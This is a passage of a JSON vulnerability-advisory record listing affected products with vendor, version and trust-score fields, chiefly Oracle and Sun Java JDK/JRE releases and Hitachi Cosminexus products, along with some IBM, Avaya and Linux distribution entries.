"version": null }, { "model": "cosminexus application server standard 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "java runtime", "scope": null, "trust": 0.7, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus studio 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "cosminexus application server standard 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus client 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "cosminexus application server enterprise 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server standard 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus application server enterprise 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus application server 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "cosminexus application server enterprise 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "runtimes for java technology 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "cosminexus developer professional 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", 